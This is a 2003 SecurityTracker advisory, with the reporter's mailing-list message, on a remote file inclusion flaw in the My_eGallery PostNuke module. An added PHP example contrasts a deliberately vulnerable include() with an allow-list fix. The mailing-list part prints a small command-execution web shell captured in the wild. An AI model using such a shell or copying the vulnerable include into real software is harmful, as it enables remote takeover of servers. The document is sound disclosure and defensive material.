SecurityTracker.com
Category:  Application (Forum/Board/Portal)  >  My_eGallery Vendors:  lottasophie.sourceforge.net
My_eGallery Include File Flaw Lets Remote Users Execute Arbitrary Commands
SecurityTracker Alert ID:  1008312
CVE Reference:  GENERIC-MAP-NOMATCH
Date:  Nov 26 2003
Impact:  Execution of arbitrary code via network, User access via network
Fix Available:  Yes   Vendor Confirmed:  Yes  
Version(s): prior to 3.1.1.g
Description:  A vulnerability was reported in the My_eGallery module for PostNuke. A remote user can execute arbitrary commands on the target server with the privileges of the target web daemon.

It is reported that some of the module's PHP files contain include statements that are not properly validated to ensure that the proper files are included. A remote user can create a specially crafted URL to cause arbitrary PHP code on a remote server to be included and executed on the target server. The PHP code can include operating system commands.

Impact:  A remote user can execute arbitrary PHP code and operating system commands on the target server with the privileges of the web server process.
Solution:  The vendor has released a fixed version (3.1.1.g) and also a hotfix for previous versions, available at:

http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

Vendor URL:  sourceforge.net/project/shownotes.php?release_id=200138
Cause:  Access control error, Input validation error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)
Reported By:  "Bojan Zdrnja" <Bojan.Zdrnja@LSS.hr>
Message History:   None.
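The include pattern the description above refers to, as an added example that is not My_eGallery's own code: a hypothetical gallery page that builds an include path from a request parameter, beside an allow-list version that never lets request data reach include(). The file names, template names and the `file` parameter are assumptions.

```php
<?php
// Added example, not code from My_eGallery. File names and the 'file'
// parameter are hypothetical.

// VULNERABLE: the request parameter is concatenated straight into include().
// With allow_url_fopen enabled (the default in PHP 4-era installs), any value
// the requester supplies is fetched and executed as PHP with the web server's
// privileges, which is the behaviour the advisory describes.
function render_gallery_vulnerable(array $request): void
{
    include $request['file'] . '/gallery.php';
}

// HARDENED: map the parameter onto a fixed allow-list of local templates and
// refuse anything else. No part of the request ever becomes part of the path.
const GALLERY_TEMPLATES = [
    'list'  => __DIR__ . '/templates/list.php',
    'thumb' => __DIR__ . '/templates/thumb.php',
];

function resolve_template(string $name): ?string
{
    // Returns null for anything outside the allow-list (URLs, '..', etc.).
    return GALLERY_TEMPLATES[$name] ?? null;
}

function render_gallery_hardened(array $request): void
{
    $path = resolve_template((string)($request['file'] ?? ''));
    if ($path === null) {
        http_response_code(400);
        exit('unknown template');
    }
    include $path;
}

// Defence in depth, in php.ini: stop the interpreter from including code over
// the network even if a check like the one above is missed somewhere.
//   allow_url_fopen = Off
//   allow_url_include = Off   ; separate setting from PHP 5.2 onwards
```

Reviewing a module for this class of bug means finding every include/require whose argument is built from request data; the allow-list shape above is the fix that survives new parameters being added later.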


Source Message Contents

Date:  Thu, 27 Nov 2003 09:37:36 +1300
From:  "Bojan Zdrnja" <Bojan.Zdrnja@LSS.hr>
Subject:  Remote execution in My_eGallery
Product: My_eGallery
Versions affected: all <3.1.1.g
Website: http://lottasophie.sourceforge.net/index.php

1. Introduction
---------------

My_eGallery is a very nice PostNuke module, which allows users to create and
manipulate their own galleries on the web, plus offers various additional
features.
For more information and a demonstration you can go to the Website above.

2. Exploit
----------

Any version of My_eGallery, prior to 3.1.1.g, is susceptible to this
vulnerability.

Certain PHP files have some parameters which are used in include functions
and are not filtered.
An intruder can craft PHP code on their Web site and supply a parameter to
My_eGallery so that it actually includes the malicious PHP code.

The following code was captured as being used in the wild (edited
intentionally):

<?
  // CMD - To Execute Command on File Injection Bug ( gif - jpg - txt )
  if (isset($chdir)) @chdir($chdir);
  ob_start();
  execute("$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp");
  $output = ob_get_contents();
  ob_end_clean();
  print_output();
?>

This allows execution of any command on the server with My_eGallery, under
the privileges of the Web server (usually apache or httpd).


3. Solution
-----------

The vendor was contacted and promptly replied. A fix is available at the
vendor's site:

http://lottasophie.sourceforge.net/modules.php?op=modload&name=Downloads&file=index&req=viewdownload&cid=5

As this was seen being exploited in the wild, users are urged to upgrade to
the latest version as soon as possible.




Regards,

Bojan Zdrnja
CISSP

Copyright 2003, SecurityGlobal.net LLC